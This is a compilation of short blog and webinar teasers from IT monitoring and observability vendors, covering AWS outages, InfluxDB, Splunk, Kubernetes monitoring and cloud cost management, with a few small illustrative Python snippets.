According to a 2020 CNCF survey, the use of containers in production has been rapidly increasing for the past several years. Nutanix, a global leader in cloud software and a pioneer in hyperconverged infrastructure solutions, is part of that trend.

New release MetrixInsight for CVAD - v1.4.21000.x

GripMatix is a Citrix partner and market leader providing SCOM Management Packs for monitoring Citrix Virtual Apps and Desktops, Citrix License Server, Citrix Provisioning Services, Citrix StoreFront and Application Delivery Controller, formerly known as Citrix NetScaler. Our solutions have been tested and verified within the Citrix Ready program. Besides quality updates, we continuously work on developing new features to improve your Business Continuity and Performance even further.

Atlassian: Accelerating Observability in the Data Age

Atlassian, a leading provider of team collaboration and productivity software, aims to merge the analytics and observability space to deliver consistent, reliable experiences to customers. See how Atlassian manages its DevOps environment to drive business transformation. Colby Funnell, Head of Observability, also shares the company’s vision for OpenTelemetry.

What is eBPF and Why is it Important for Observability?

Observability is one of the most popular topics in technology at the moment, and that isn’t showing any sign of changing soon. Agentless log collection, automated analysis, and machine learning insights are all features and tools that organizations are investigating to optimize their systems’ observability. However, there is a new kid on the block that has been gaining traction at conferences and online: the Extended Berkeley Packet Filter, or eBPF. So, what is eBPF?

Web Performance of the World's Top 50 Travel Sites in 2021

2021 holiday travel has been a rebound for the industry. Just this week, I was attempting to purchase flights for a long weekend before travel picks up for the holidays. However, after a failed attempt to sign up for their Executive Club and enduring slow page loads after every click, I abandoned the site and booked elsewhere. Just like that, I was a lost customer.

AWS Cloud Performance Anomaly Detection - A Real-life Case Study

Here’s a myth that needs to be debunked – the cloud will take care of my performance problems! Our experience shows that cloud architecture usually introduces new layers of complexities that did not exist in the on-premises world. You need a modern AI-powered full stack monitoring solution to find the needle in the multi-layered haystack that is the cloud. Sometimes, it’s the cloud vendor who has to fix the issue.

Why you Need WiFi Observability in the Era of Work From Anywhere

“Work from anywhere” is now a common occurrence. With so many companies now dependent on a distributed workforce, IT teams need to be able to quickly diagnose and troubleshoot WiFi problems. Moreover, they, themselves, are often working remotely. In order to successfully do their jobs, consistent WiFi is obviously essential for remote workers.

EC2 Reserved Instance: Everything You Need to Know

An Amazon Reserved Instance (RI) is one of the most powerful cost savings tools available on AWS. It’s officially described as a billing discount applied to the use of an on-demand instance in your account. To truly understand what RI is, we need to take a step back and look at the different payment options for AWS.

Migrating to DX APM FAQs

Migrating to Broadcom’s next-generation DX APM will provide you with the benefits of a modern architecture, high scalability, and comprehensive observability. With its advanced capabilities, the platform can support your organization’s monitoring needs long into the future. For your convenience, below is a summary of frequently asked questions and answers on migrating to DX APM.

High Five: The Latest Integrations from Splunk, Microsoft and GitHub

Hello Splunk Nation! Welcome to the latest roundup of Splunk integrations with Microsoft and GitHub! Hopefully, you had a chance to virtually attend .conf21 and check out all the amazing content. For those of you who missed it, we’re recapping the Microsoft, GitHub and Splunk highlights below.

The Top 8 Website Monitoring Tools in 2021

Every business owner understands the importance of website monitoring. It is essential to take steps to avoid performance and availability issues on websites. A great start would be to examine every aspect of your web infrastructure. That's where website monitoring tools come into the picture. You can continuously observe your website's performance and uptime with website monitoring services. These tools make you aware of any server downtime or connection issues.

Responsible For Your O365 Budget? Rightsize Your Licenses Now To Avoid Extra Cost!

Pricing for most Microsoft 365 (M365) and Office 365 (O365) suites is due to increase on 1 March 2022 by up to a whopping 25%, prompting many I&O leaders to assess their Microsoft cost optimization options before their next renewal. Microsoft first revealed the price increase on 19 August 2021, and is justifying the decision by making a wider set of features and services available, such as security, audio services or device/user management, regardless of whether they’re required.

Accelerating Cloud Monitoring via the Logz.io Azure Native Integration

Watch this Logz.io and Azure Cloud team webinar to learn about the Logz.io Azure Marketplace native integration. More specifically, it covers collecting logs from Azure resources or applications in minutes with Logz.io, all within the Azure Portal; integrating Logz.io with Active Directory SSO for access control; and collecting logs through a new “pay for what you use” pricing model rather than committing to log volumes and plans upfront.

The 9 best Real User Monitoring tools for 2021: A comparison report

Real User Monitoring (RUM) provides visibility into the performance experience of live users interacting with your web, mobile, or single-page apps. RUM tools emerged to bridge the gap between application performance metrics and the impact on real people. These days, user experience is increasingly factored into the development process, but that still doesn’t stop slowdowns.

DevOps and monitoring: the perfect pair when they work together

Organizations throughout the globe have been working for years to find more efficient ways to remove the barriers hindering the speed at which computing services and applications are rolled out to market. These barriers often present challenges for how DevOps and monitoring work together. From the requirements-and-design phase, through planning and development, to testing, software projects can take between 4 and 9 months to complete depending on their size and complexity.

Secure HashiCorp Vault with Datadog Cloud SIEM

HashiCorp Vault provides centralized storage and management of passwords, API keys, tokens, and other secrets that distributed applications can use to operate securely. Vault clients—services and applications that access secrets programmatically, as well as users who interact with a Vault server—can create, update, and read secrets based on the permissions you grant them.

What we learned from AWS's us-east-1 outage

In case you missed it, for several hours on December 7, 2021, AWS's us-east-1 region had an outage impacting multiple AWS APIs, taking out various websites across the internet. According to our own monitoring at OnlineOrNot, the outage started at 2021-12-07 15:32 UTC and began to recover well at 2021-12-07 22:48 UTC (with minor signs of life for a few minutes around 2021-12-07 20:08 UTC). Had we relied solely on AWS to update their status page before reacting, we would have been waiting a while.
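
For a sense of scale, the timestamps quoted above can be turned into durations with a few lines of Python. This is only a sketch of the arithmetic: the three timestamps come from the text, while the variable and function names are illustrative assumptions.

```python
from datetime import datetime, timezone

FMT = "%Y-%m-%d %H:%M"


def parse_utc(stamp: str) -> datetime:
    """Parse a 'YYYY-MM-DD HH:MM' string as a timezone-aware UTC datetime."""
    return datetime.strptime(stamp, FMT).replace(tzinfo=timezone.utc)


def minutes_between(start: datetime, end: datetime) -> int:
    """Whole minutes elapsed from start to end."""
    return int((end - start).total_seconds() // 60)


# Timestamps as reported in the text above (all UTC).
outage_start = parse_utc("2021-12-07 15:32")
brief_signs_of_life = parse_utc("2021-12-07 20:08")
recovery_start = parse_utc("2021-12-07 22:48")

to_brief_recovery = minutes_between(outage_start, brief_signs_of_life)
to_recovery = minutes_between(outage_start, recovery_start)

print(f"First signs of life after {to_brief_recovery // 60}h {to_brief_recovery % 60}m")
print(f"Recovery began after {to_recovery // 60}h {to_recovery % 60}m")
```

By these figures, more than seven hours passed between the first failed checks and the start of sustained recovery.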

Why the Return to the Office Can Kill Microsoft Teams Performance

With the participation of Cam Smith, Microsoft Teams Product Manager at Microsoft Canada. What Teams performance challenges will organizations face as they return to the office, and how do you avoid them proactively? This educational webinar will showcase these topics.

Overcoming challenges remote working has created for enterprise IT teams

I recently joined Neil C. Hughes on his podcast TechFusion by Citrix Ready to discuss the challenges that remote working has thrust upon enterprise IT teams. I’ve followed Neil’s work for some time from afar, so it was a joy to meet him and appear on his podcast alongside Allan Furmanski, the lead product marketing manager for Citrix Virtual Apps and Desktops.

7 Reasons Why MSPs Benefit From IT Automation

Automation has become the backbone for businesses wanting to stay afloat in the highly competitive markets today. Managed Service Providers (MSPs) are among those reaping heavily from IT automation processes. The benefits MSPs obtain from IT automation include lower costs, reduced errors, and increased productivity. With automation, MSPs can acquire better data, become more reliable, and scale their operations.

How Sentry Fed the Code Observability Revolution at Shift

What happens when you have to evolve a monolithic application into a microservices architecture in order to scale a doubling Engineering staff while meeting the expectations of a growing business? Join Aaron Chu, Senior Director of Technical Operations and Karan Gupta, CTO at Shift, a modern tech company disrupting the used car industry, as they share Shift’s journey to define their Observability culture. They’ll walk through how Shift uses Sentry to ensure accountability and empower engineers to improve overall outcomes.

Tracing makes a bug easy to spot

Today, I found a bug before I noticed it. Like, it was subtle, and so I wasn’t quite sure I saw it—maybe I hadn’t hit refresh yet? Later, I looked at the trace of my function and, boom, there was a clear bug. Here’s the function with the bug. It responds to a request to /win by saving a record of the win and returning the total of my winnings so far. Can you spot the problem in the TypeScript? It’s subtle. Now here’s a trace in Honeycomb: Now do you see the bug?

How Better Collaboration and Planning Drive a Superior Digital Experience

An outstanding customer experience is one that keeps customers coming back, while spreading the word about their experience. Your applications are the heartbeat of that service delivery experience for both customers and other end users. When the experience wows, customer satisfaction grows.

On AI Adoption, IT Teams Lag Far Behind Security Teams. AIOps Can Help

Security operations teams and IT operations teams share a lot in common. They have both spent the past decade grappling with systems that grow more complex every year and figuring out ways to handle ever-larger volumes of data. They also both face pressure to identify and remediate problems as quickly as possible – ideally, in real time. And they are supposed to do it all without breaking the bank.

Introducing... Splunk for iPad!

Are you busy and on the go but still need to dig into your data and view your dashboards? We’ve got you covered — introducing… Splunk for iPad! Splunk for iPad is designed for and dedicated to what’s unique and great about the iPad, taking full advantage of its portable and interactive nature with unique dashboard annotation and note-taking features.

Immersive Tech & Metaverses: Is 'Extended Reality' the Future of Hybrid Work?

Virtual reality, augmented reality, 3D environments…no matter what you do for work, you’ve been hearing these futuristic-sounding terms for years. To the average worker, these technologies have always existed on the periphery of day-to-day life. They might make waves in the gaming industry, for example, but they’re not changing the workplace on a mass scale. Well, that’s about to change.

Getting Started with Java and InfluxDB

Time series data is becoming vital, from IoT devices’ sensors to financial processing. The data collected from these sources can help in sales forecasting and making informed decisions about marketing and financial planning. In this article, you will learn about InfluxDB, one of the most efficient time series databases currently available, and explore how to use InfluxDB with Java.

Estimating Your Cloud Costs is EASY. Do it in Just 3 Clicks.

One of our customers recently got their first bill after moving their Linux and Windows workloads to Azure. Their bill was astronomical! They struggled to answer the question, “how much will it cost?” and their initial cost assessments were vague at best. Here’s what they did.

Monitor the Azure Cosmos DB integrated cache with Datadog

Azure Cosmos DB is a fully managed NoSQL database that scales automatically with load and supports multiple APIs. This makes it easy to incorporate with your applications while removing the need to maintain your own database servers. The Cosmos DB integrated cache—which is now in public preview—is a new offering that can help reduce costs and improve performance for Azure Cosmos DB.

Website and Performance Monitoring for Edge Cases

Specific needs are compelling but also hard to plan for. Your use case may be the reason you are searching for a monitoring provider, but the ability of your provider to adapt to your edge cases will be the reason you stay. The challenge is in discerning if a provider will be able to rise to meet your needs in unknown circumstances. In monitoring, there are some uniform needs. Everyone wants to know if their site is UP so HTTP(S) checks meet use cases universally.

A successful Monitoring as a Service Case: Drilling & Mining Industry

Migrating or restructuring a SCOM environment can seem like an overwhelming, even impossible, task. For one of our customers in the mining industry, however, it went more than well, and the improvements have been exceptional. Applying our Monitoring as a Service, they could benefit from the aggregated experiences of programmers, system administrators, and DevOps engineers that our service builds on to make the migration as smooth and trouble-free as possible.

ScienceLogic's DoDIN APL Certification Journey: Watch out for Spiders & Snakes

This is the fourth and final in a series of ScienceLogic blogs on the topic of the Department of Defense Information Network (DoDIN), including what it is, what it means to be approved under DoDIN standards, why it is important to both our federal and private industry customers, and the process for being approved for listing.

The Most Impactful IT Trends of 2021

As we look back at technology in 2021 it can always be interesting to reflect on what we thought was going to be and what actually came to fruition. Reflecting, one thing that was for certain is that there was more interest in cloud than ever, but who could have realized the hype that cybersecurity would get? Today, let’s look at the technology trends that came out of 2021 to kick off a year in technology review.

AWS Outage on Dec. 7, 2021 - When Did You Know About It?

If something isn’t working as expected, your customers will want to know. How quickly did you know that AWS’s us-east-1 region was having issues? Was it from an article online? Customer requests flooding into your support queue? A tweet?? Not being able to get into a PUBG match? Or speaking of matches, were you unable to message your last Tinder connection?

Broadcom Announces Intent to Acquire AppNeta

Broadcom announced its intent to acquire privately-held AppNeta, headquartered in Boston, MA. AppNeta is a provider of SaaS-based solutions that provide enterprise IT teams with precise, end-to-end visibility into network performance from the end-user’s point of view. Combined with Broadcom Software’s DX NetOps, AppNeta's monitoring capabilities will help enterprises and service providers to more efficiently diagnose and improve network performance for end-users, independent of what network they use to access applications.

Better Together - DX NetOps and AppNeta Enable a New Level of Network Visibility, Anywhere

Broadcom announced its intent to acquire privately-held AppNeta, headquartered in Boston, MA. AppNeta is a provider of SaaS-based solutions that provide enterprise IT teams with precise, end-to-end visibility into network performance from the end-user’s point of view. Together, DX NetOps and AppNeta deliver network visibility into any connected experience over any network.

Python JSON Log Limits: What Are They and How Can You Avoid Them?

Python JSON logging has become the standard for generating readable structured data from logs. While logging in JSON is definitely much better than using the standard logging module, it comes with its own set of challenges. As your server or application grows, the number of logs also increases exponentially. It’s difficult to go through JSON log files, even when they are structured, due to the sheer size of the logs generated.
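
As a rough illustration of what JSON logging in Python can look like, here is a minimal sketch built on the standard library `logging` module rather than on any particular third-party package. The `JsonFormatter` class, the `build_logger` helper, and the chosen field names are assumptions made for this example, not something taken from the article.

```python
import json
import logging


class JsonFormatter(logging.Formatter):
    """Render each log record as one JSON object per line (illustrative)."""

    def format(self, record: logging.LogRecord) -> str:
        payload = {
            "time": self.formatTime(record),
            "level": record.levelname,
            "logger": record.name,
            "message": record.getMessage(),
        }
        # Attach the traceback text only when the record carries one.
        if record.exc_info:
            payload["exception"] = self.formatException(record.exc_info)
        return json.dumps(payload)


def build_logger(name: str = "app") -> logging.Logger:
    """Hypothetical helper: a logger that writes JSON lines to stderr."""
    logger = logging.getLogger(name)
    handler = logging.StreamHandler()
    handler.setFormatter(JsonFormatter())
    logger.handlers = [handler]
    logger.setLevel(logging.INFO)
    logger.propagate = False
    return logger
```

Calling `build_logger().info("user %s logged in", "alice")` would emit a single JSON line, which is easier to filter by field than free-form text, although the volume problem described above remains.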

From Juilliard to Bare Metal with Zac Smith | Network AF Episode 7

On this episode of Network AF, Avi talks with Zac Smith, Bare Metal Managing Director at Equinix. Zac is a graduate of Juilliard, has started multiple networking companies, and is an Operating Board Member of Pursuit. This nonprofit program teaches and mentors underrepresented communities, creating opportunities in the tech and networking space.

Incident Review - AWS Outages Crash Major Online Services - Including Amazon

The following is an analysis of the Amazon Web Services incident on 12/07/2021. Millions of users were affected by an Amazon Web Services outage that took down major online services such as Amazon, Amazon Prime, Amazon Alexa, Venmo, Disney+, Instacart, Roku, Kindle, and multiple online gaming sites. The outage, which originated in the US-EAST-1 region on Dec. 7, 2021, is still ongoing at the time of blog publication.

Elastic Observability 7.16: Ad hoc analytics and CI/CD pipeline visibility

Elastic Observability 7.16 introduces curated data exploration views for ad hoc analysis and further extends visibility into complex and distributed systems with the general availability (GA) of dozens of prebuilt Elastic Agent data integrations, observability tooling for continuous integration and continuous delivery (CI/CD) pipelines, and a new native data source integration with Amazon Web Services (AWS) FireLens. These new features allow customers to.

Broadcom Software Announces Intent to Acquire AppNeta

As consumers, we are all intimately aware of our individual dependence on the internet. Now consider that dependency and apply it to the business-critical services that your company uses daily. Nearly overnight, companies are at the mercy of the internet, a network of public networks, as nearly all employees work remotely and apps that were once hosted internally move to external SaaS providers.

AppNeta Brings Borderless Monitoring to Broadcom's NetOps Solution

It was at the turn of the millennium. I was one of the first engineers entrusted with the job of installing Network Computers, the thin client that Oracle had just introduced as an alternative to personal computers. During the process, as I described the benefits of network computing and three-tier architecture to customers, there was a palpable skepticism all around. Twenty years have passed since. Client-server gave way to three-tier architecture, and with the internet came cloud computing.

Broadcom and AppNeta: Better Together

Broadcom Software just announced the intention to acquire AppNeta, a pioneer in end-user experience over the internet. AppNeta will be integrated with DX NetOps, the network monitoring software portfolio within Broadcom’s Enterprise Software Division. The acquisition marks a key milestone in the DX NetOps vision to assure Network Observability Anywhere. AppNeta adds solutions, technologies, and people that will enable DX NetOps to deliver more value to our customers and partners.

PTC Kepware and InfluxDB: Collecting and Storing Your Automation Data

If you have worked in the automation sector for some time, it is likely you have come across or at least heard of PTC Kepware. They provide one of the largest connectivity suites for automation devices such as PLCs, easing the bridge between the OT (Operational Technology) and IT (Information Technology) worlds. The best part? You can store, transform, and visualize this data using InfluxDB. This blog post will take you through the different ways of connecting your Kepware instance to InfluxDB.

How to Use AWS Lambda Serverless Functions with InfluxDB

For time series workloads the ability of serverless functions to scale up and down is a major advantage, especially for something like IoT devices that may have intermittent connectivity and might suddenly send data in bursts. In this type of situation, it doesn’t make sense to be paying for a server to be running 24/7 when you can use a serverless function and only pay for the compute you use.

Infrastructure Monitoring and Management: How Monitoring KPIs are Helping You to Improve the Infrastructure Management

In any enterprise, IT or otherwise, infrastructure monitoring and management are extremely crucial. A drop in performance or a failure of a machine can lead to significant delays. For that reason, there’s a constant need for eyes on the overall infrastructure to ensure smooth operations. One of the best ways to gauge the overall health of infrastructure is by monitoring key performance indicators (KPI).

The Power Of The OpsRamp Platform | Hayden Sak | OpsRamp Shorts

The OpsRamp platform helps IT operations teams monitor their cloud and on-prem infrastructure and resolve incidents with machine learning. It is digital operations for modern, digital business. Listen to Hayden Sak as he uncovers the power of the OpsRamp platform and how it helps drive visibility and control across a hybrid, multi-cloud infrastructure landscape.

Testing shift left observability with the Grafana Stack, OpenTelemetry, and k6

Development is no longer a linear journey from point A to point B. As more projects shift into a state of organic growth, user feedback and constant experimentation are increasingly becoming the norm, if not the standard for engineering. “In order to support this rapid experimentation, we’re beginning to embrace new working methods and practices,” said Vinodh Ravi, Executive Director of Platform Engineering at JPMorgan Chase.

AWS Lambda Use Cases: 6 Inspirational Examples

Since its launch in 2014, the AWS Lambda service has spread fast among developers and cloud architects because it is easy to use and offers a significant cost benefit (pay-per-use basis). AWS Lambda is an Amazon Web Services serverless deployment platform that you can use in the AWS cloud environment with basically no overhead. Using Lambda to run code for websites, applications, and services on AWS can save you considerable time and resources.

The Evolution of Broadcom APM: An Interview with James Kao

I recently talked with James Kao, Head of Engineering for APM at Broadcom. James leads the global development team to deliver the AIOps and application monitoring solutions that power the world's most successful businesses. He has had a diverse background in application development and monitoring across development, product management, and solution engineering roles over the last 20 years at both large enterprises and startups such as Oracle, ClearApp, and The Middleware Company.

The 5 Key Business Benefits of AIOps

It’s easy to see why developers and IT engineers should care about AIOps, which automates tasks (like incident remediation) that they would otherwise have to perform manually. But what does the business get out of AIOps? How do AIOps-powered tools help improve business outcomes? Those questions are critical to answer for any organization considering an investment in AIOps solutions.

Performance Testing Tools: 8 to Help Find Your Bottlenecks

Performance is a vital component of user experience. Users will leave—and likely not come back—if your site is slow. If they stay, they’ll be less likely to buy from you if their experience is subpar. To add insult to injury, they’re even less likely to find your app to begin with, since Google punishes poorly-performing sites in the search results. To solve the problem of poor performance, knowledge of what impacts performance is essential.

Cloud Cost Management: A Compendium of 49 Stats, Benefits, Hard Truths, Tips, and Requirements

Cloud computing has many benefits. But there are also challenges, and cloud cost management may be one of the biggest. Here are 49 stats, benefits, and hard truths you need to know about cloud cost management, along with tips and requirements to help you take control and keep your spending in check while delivering on all the value you’re looking for.

Getting Started with the InfluxDB 2.0 API and Postman

Whether you’re using InfluxDB Cloud or InfluxDB OSS, the InfluxDB API provides a simple way to interact with your InfluxDB instance. The InfluxDB v2.0 API offers a unified approach to querying, writing data to, and assessing the health of your InfluxDB instances. Today we want to share a Postman project to help you use the API easily. Postman is “an API platform for building and using APIs”.

Percepio Wins Coveted Elektra Award for Tracealyzer for Linux

Percepio®, the leader in visual trace diagnostics for embedded systems and the Internet of Things (IoT), has been awarded the prestigious Elektra Award 2021 for its visual trace diagnostics tool Tracealyzer for Linux. Tracealyzer for Linux was voted best product in the “Design Tools and Development Software” category by the jury, ahead of developer tools from five other companies, including Cadence and Synopsys.

Get alerts on metrics that matter to you with SigNoz - SigNal 07

Welcome to SigNal 07! We sipped coffee, shipped code, fixed bugs, and made commits! The highlight of November was the alerts feature release 🔔. We also expanded our team and got our first community-led tutorial on how to monitor a Ruby on Rails app with SigNoz. Let's dive in to see what the humans of SigNoz have been up to in the month of November.

Dashboard Fridays: Sample PagerDuty Alerting dashboard

Adam Kinniburgh is back with another Dashboard Fridays episode, this time joined by Ashley Thompson as they showcase this example PagerDuty Alerting dashboard. This dashboard gives an overview of alerting sent to PagerDuty from any source, even external sources like Pingdom.

The Impact of AI and ML in ITSM with 10 Real World Use Cases

Artificial intelligence (AI) was highlighted as a key IT service management (ITSM) trend in 2021. IT organizations are beginning to employ various AI and machine learning techniques to enhance and improve IT service management processes. Because of the abundance of data generated by ITSM systems, applying machine learning to ITSM processes makes a lot of sense as it can provide IT professionals with a deeper understanding of their infrastructure and procedures.

How to Measure Jitter | Obkio

Jitter is one of the core network metrics that you should be measuring when monitoring your network performance. Jitter is your network's biggest enemy when using UC and real-time apps like IP telephony, video conferencing, and virtual desktop infrastructure. The most accurate way to measure jitter is with network monitoring software, like Obkio. For example, the amount of jitter displayed over an aggregated period of 1h is the worst median jitter of all the small 1-min periods within that hour.
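
The hourly aggregation rule described above can be sketched in a few lines of Python. This is only an illustration of the arithmetic, assuming that "worst" means the highest value and that jitter samples are already grouped by minute; the function name `aggregated_jitter` and the input layout are hypothetical and not part of any Obkio API.

```python
from statistics import median
from typing import Sequence


def aggregated_jitter(samples_ms_by_minute: Sequence[Sequence[float]]) -> float:
    """Return the highest per-minute median jitter (in ms) for the period.

    Each inner sequence holds the jitter samples measured during one minute.
    Minutes without samples are skipped.
    """
    per_minute_medians = [median(m) for m in samples_ms_by_minute if m]
    if not per_minute_medians:
        raise ValueError("no jitter samples in the aggregation period")
    return max(per_minute_medians)
```

Taking the maximum of the per-minute medians keeps a single bad minute visible in the hourly figure, while the median within each minute dampens one-off spikes.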

4 Steps to Making Observability Real for Your Team

Without unified observability, it’s stressful not having complete visibility into your application. Plus, it contributes to risky deployments. Yet we hear that many developers have poor visibility into what powers production code. Without transparency into their apps, developers cannot see: You can try navigating tickets, permissions, and dashboards that don’t tell the right story, but there are ways to solve this problem.

Auvik Rollup & Roadmap Update - Q4 2021

Patrick Albert, VP Product Management, and Julie Forsythe, VP Engineering, discussed the latest Auvik developments and handy new features in our Q4 2021 Rollup & Roadmap Update. See what's new, from Discovery Dashboard, syslog, and device information improvements to certification updates for SAML SSO admins to out-of-the-box identification support for 40 more devices, and get a sneak peek into what we're working on to improve your troubleshooting experience and product extensibility.

Nexthink Secures Series D Funding - Valuation of $1.1 Billion!

Watch now to hear Nexthink’s CEO and Co-founder Pedro Bados announce an important milestone for Nexthink: raising $180M in a Series D round and garnering a $1.1B valuation. Accelerated innovation and further customer success is on the horizon following this announcement. Find out more about what this means for Nexthink’s future and the future of Digital Employee Experience.

New feature in Loki 2.4: no more ordering constraint

A new version of Loki was released back in November, and I’m here to talk about one of its most exciting features. Loki 2.4 finally removed the requirement that all data must be ingested in timestamp-ascending order. Instead, Loki now allows out of order logs up to a configurable validity window (more to come on that). In this post, I’ll walk through what all this means and why we’re thrilled about it.
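
To make the idea of a validity window concrete, here is a simplified Python sketch of an acceptance rule for one log stream. It is not Loki's implementation: the `Stream` class, the `window_seconds` parameter, and the exact comparison are assumptions chosen only to illustrate accepting entries that arrive late, as long as they are not too far behind the newest entry seen so far.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Stream:
    """Tracks the newest timestamp seen for one log stream (illustrative)."""

    window_seconds: float
    newest: Optional[float] = None

    def accept(self, ts: float) -> bool:
        """Return True if an entry with timestamp `ts` would be accepted."""
        # In-order (or first) entries are always accepted and advance the clock.
        if self.newest is None or ts >= self.newest:
            self.newest = ts
            return True
        # Out-of-order entries are accepted only inside the validity window.
        return (self.newest - ts) <= self.window_seconds
```

With a 60-second window, an entry 30 seconds older than the newest one would be accepted, while an entry 100 seconds older would be rejected.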

Live from AWS re:Invent - Data Drivers & Racing as a Service

Presenter: Cory Minton, IT Strategist. Splunk believes that every problem has an answer in data, and esports racing is no different! Join this session to see how Splunk partnered with McLaren Shadow Esports to bring critical insights to the services that matter most in SIM racing with Splunk Cloud in AWS.

Expand Kubernetes Monitoring with Telegraf Operator

Monitoring is a critical aspect of cloud computing. At any time, you need to know what’s working, what isn’t, and have the ability to respond to changes occurring in a given environment. Effective monitoring begins with the ability to collect performance data from across an ecosystem and present it in a useful way. So the easier it is to manage monitoring data across an ecosystem, the more effective those monitoring solutions are and the more efficient that ecosystem is.

New Full Page Check upgrades support end user demand for richer features

Software upgrades are typically about offering new features and improvements that enhance the end user experience, offer greater efficiency, and provide a more feature-rich product. These are also some of the reasons why Uptrends has released a new version of the Full Page Check monitor, which offers lots of benefits over the previous version. The demand for more metrics has grown over time, not only for how the elements load but also for how the page is presented to end users.

Tiggee LLC Announces Acquisition of PerfOps Data Suite

Tiggee LLC, parent company of DNS Made Easy and Constellix has announced the acquisition of PerfOps and its enterprise data monitoring suite. Adding PerfOps to the Tiggee family enhances the company's position in the DNS and Cloud industry and will allow Tiggee to leverage its direct knowledge and 20-plus years of experience to increase the effectiveness and value of PerfOps for the industry as a whole.

State of IT Management Survey Report 2020-21

As we continue to adapt following the pandemic, which has impacted us all both personally and professionally, we take this moment to commemorate the IT veterans we've lost to the pandemic. With the pandemic drastically changing the way we do business, we have conducted a study to understand the state of IT management at the height of these radical changes and analyzed how to offer a holistic approach to changing IT management needs to prepare for the post-pandemic IT world.

7 Trends in Database DevOps & Monitoring - Download the infographic

Earlier this year, we surveyed over 5,700 global IT professionals and asked them about the most pressing challenges they face in Database DevOps and Monitoring. We also asked specific questions to gauge what trends we could spot in the industry and compared the responses to the last 3-5 years of data we have.

Introducing Adaptive Alerts: Detect application-level error trends

Adaptive Alerts is a new feature from Rollbar that adds to our reliable, informative and actionable alerts about unexpected issues in monitored applications and services. Adaptive Alerts uses anomaly detection to learn the standard behavior of enterprise applications, and alerts developers about atypical exception rates, reducing unwanted noise.

An Introduction to Log Analysis

If you think log files are only necessary for satisfying audit and compliance requirements, or to help software engineers debug issues during development, you’re certainly not alone. Although log files may not sound like the most engaging or valuable assets, for many organizations, they are an untapped reservoir of insights that can offer significant benefits to your business.

Why observability is the way to go w/ Georg Höllebauer (APA-Tech) | The StackPod EP #2

Welcome to the second episode of the StackPod! For the second episode, we invited Georg Höllebauer. Georg is an enterprise metrics architect at APA-Tech. APA-Tech is responsible for all IT services within the Austrian Press Agency - Austria's national and largest press agency - and other customers.

New in the Kubernetes integration for Grafana Cloud: curated dashboards, built-in alerts, and more

Back in May, we announced the Kubernetes integration to help users easily monitor and alert on core Kubernetes cluster metrics using the Grafana Agent, our lightweight observability data collector optimized for sending metric, log, and trace data to Grafana Cloud. The integration allows Grafana Cloud users to monitor and alert on Kubernetes cluster metrics. Since the original release, we’ve added new features and enhancements to help our users go even further.

Goliath Technologies Launches Multi-Cloud Monitor

Philadelphia, PA – December 2, 2021 – Goliath Technologies, a leader in end-user experience monitoring and troubleshooting software for hybrid cloud environments, announced today the release of its groundbreaking Goliath Multi-Cloud Monitor offering.

Live from AWS re:Invent - Time Travel with Splunk and AWS

Presenters: Jon LeBaugh and Robert Gustafson. Time Travel is possible! Well, at least for data in Splunk. Learn how and why we use AWS Lambda, Splunk SmartStore, and Amazon S3 to move data into the future in this behind-the-scenes look at Splunk’s Boss of Ops and O11y capture the flag competition.

Live from AWS re:Invent - Metrics and Logs Sitting in a Tree, Lowering your MTT*s

We all know by now that the exponential increase in cloud complexity has required a shift in traditional monitoring. These major changes lead to major challenges. In most environments, it is becoming more and more difficult to predict outages and determine root cause. There is a need for both real-time monitoring and alerting as well as a way to flexibly dig into your data to determine true root cause. Introducing the hottest new couple: metrics and logs. Come see how this duo can help speed up cloud adoption, future-proof your cloud monitoring, and lower MTTD and MTTR.

Five things everyone needs to know about their AWS environment that they can't see from CloudWatch

At Splunk we love AWS, and we love all things CloudWatch... it's a great source of data to collect and correlate. Sometimes we get asked "Why do I need Splunk when I have CloudWatch dashboards?" What a great question! Join this session to learn about five critical insights about your AWS environment that you'll never get using CloudWatch alone. Behold the power of Splunk's search and analysis platform!

How to Monitor Cloud Services and Why It Matters

In this webinar, we explain how, and why, tools like traceroute, when used as part of synthetic monitoring, provide deep insight into network problems such as SaaS or cloud application slowdowns. Presented by Michael Patterson, Kentik network technologist, founder and former CEO of Plixer. Watch this on-demand webinar to learn.

Network Tips to Ensure a Successful AWS Migration

Join Kentik Cloud Solutions Architect, Ted Turner, and Kentik Solutions Architect, Jim Muggli, for this on-demand webinar discussion about the network solutions needed to ensure a successful AWS migration. Watch to learn how to ensure your infrastructure team can overcome the top three AWS network challenges.

Network AF, Episode 6: Cat Gurinski on mentorship and the shared languages of network engineering

In the latest episode of the Network AF podcast, your host Avi Freedman welcomes his friend and networking pro Cat Gurinski to the show. As a senior network engineer with loads of experience, Cat is most passionate about automation and troubleshooting, and especially loves to use Python and Arista’s pyeapi frameworks in her pursuits. She’s also the current chair of the NANOG Program Committee, and previously worked for companies like Best Buy, Switch and Data, and Equinix.

Announcing the GA of Splunk APM's AlwaysOn Profiling

As an update to .conf’s announcement of our continuous code profiling preview, we’re excited to share that today Splunk APM’s AlwaysOn Profiling is generally available for Java applications, included in APM at no additional cost. Here’s a quick walkthrough of the feature, and how you can get started now.

How to Deploy the Splunk OpenTelemetry Collector to Gather Kubernetes Metrics

With Kubernetes emerging as a strong choice for container orchestration for many organizations, monitoring in Kubernetes environments is essential to application performance. Kubernetes allows developers to develop applications using distributed microservices introducing new challenges not present with traditional monolithic environments. Understanding your microservices environment requires understanding how requests traverse between different layers of the stack and across multiple services.

Plugin Spotlight: Exec & Execd

Telegraf comes with over 200 input plugins that collect metrics and events from a comprehensive list of sources. While these plugins cover a large number of use cases, Telegraf provides another mechanism to give users the power to meet nearly any use case: the Exec and Execd input plugins. These plugins allow users to collect metrics and events from custom commands and sources determined by the user.
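
As a sketch of the kind of custom command these plugins can run, the Python script below prints one metric in InfluxDB line protocol to standard output. The measurement name `queue_depth`, the tag and field values, and the `to_line` helper are all made up for illustration, and the helper assumes names and tag values contain no spaces, commas, or equals signs (it does no escaping).

```python
import time
from typing import Mapping, Optional


def to_line(
    measurement: str,
    tags: Mapping[str, str],
    fields: Mapping[str, float],
    ts_ns: Optional[int] = None,
) -> str:
    """Format one point as line protocol: measurement,tags fields timestamp."""
    tag_part = "".join(f",{k}={v}" for k, v in sorted(tags.items()))
    # All field values are written as floats to keep the sketch simple.
    field_part = ",".join(f"{k}={float(v)}" for k, v in sorted(fields.items()))
    timestamp = time.time_ns() if ts_ns is None else ts_ns
    return f"{measurement}{tag_part} {field_part} {timestamp}"


if __name__ == "__main__":
    # Hypothetical metric; a real script would read this from your own source.
    print(to_line("queue_depth", {"host": "web01"}, {"pending": 12}))
```

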